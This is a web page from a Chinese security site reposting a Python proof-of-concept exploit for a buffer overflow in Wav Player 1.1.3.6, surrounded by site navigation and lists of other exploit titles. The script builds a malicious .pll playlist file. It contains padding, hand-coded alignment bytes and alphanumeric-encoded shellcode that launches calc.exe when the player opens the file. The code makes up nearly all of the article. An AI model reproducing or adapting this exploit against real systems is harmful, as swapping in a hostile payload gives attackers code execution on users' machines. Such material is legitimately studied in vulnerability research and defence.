首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wav Player 1.1.3.6 .pll Buffer Overflow Exploit
来源:vfocus.net 作者:Ferreira 发布时间:2011-09-13  

# Exploit Title: wav player 1.1.3.6 .pll Buffer Overflow
# Date: 12/09/2011
# Author: Ivan Garcia Ferreira
# Version: 1.1.3.6
# Tested on: Windows 7 SP1 x86 Spanish
#
# Description:
# Wav player can not handle properly large playlists (more than 1G).
# Reproduce:
# Open the wav player, make a playlist and save it. Then, close the
# player and run this exploit to create the new playlist. When you open again
# wav player, you will see the calc. ;)
#
# Thanks to:
# Corelan Team for their excelent articles about exploits

fichero = open("wv_player.pll", "w")
print "[+] Creating exploit .pll..."

fichero.write("A"*1034) # Padding

fichero.write("t%dA")  #help the first ret
fichero.write("\x6d")  #nop/align
fichero.write("\x55")  #push ebp
fichero.write("\x6d")  #nop/align
fichero.write("\x58")  #pop eax
fichero.write("\x6d")  #pop/align
fichero.write("\x05\x14\x11")   #add eax,0x11001400
fichero.write("\x6d")  #pop/align
fichero.write("\x2d\x04\x11")   #sub eax,0x11001300
fichero.write("\x6d")  #pop/align

fichero.write("\x50")  #push eax
fichero.write("\x6d") #nop/align
fichero.write("\xc3") #ret

fichero.write("B"*306) # more padding

# Shellcode WinExec "calc.exe"
fichero.write("PPYAIAIAIAIAQATAXAZAPA3QADAZA" +
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA" +
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB" +
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K" +
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL" +
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55" +
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V" +
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB" +
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT" +
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU" +
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM" +
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC" +
"QQ2LRCM0LJA")

# Padding to get the crash
for cont in range(1,14000):
 fichero.write("A"*15000)
fichero.close()

print "[+] File Exploit .pll Created."
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Aika 0.2 colladaconverter Xml
·KnFTP Server Buffer Overflow E
·Procyon Core Server HMI <= v1.
·ScadaTEC ModbusTagServer & Sca
·Microsoft WINS Service <= 5.2.
·Mel0nPlayer 1.0.11.x Denial of
·MS WINS ECommEndDlg Input Vali
·BisonFTP Server Remote Buffer
·Super Scrren Recoder Local Buf
·Wing FTP Server USER Buffer Ov
·WMV Cut And Split Local Buffer
·PHP "phar/phar_object.c" forma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved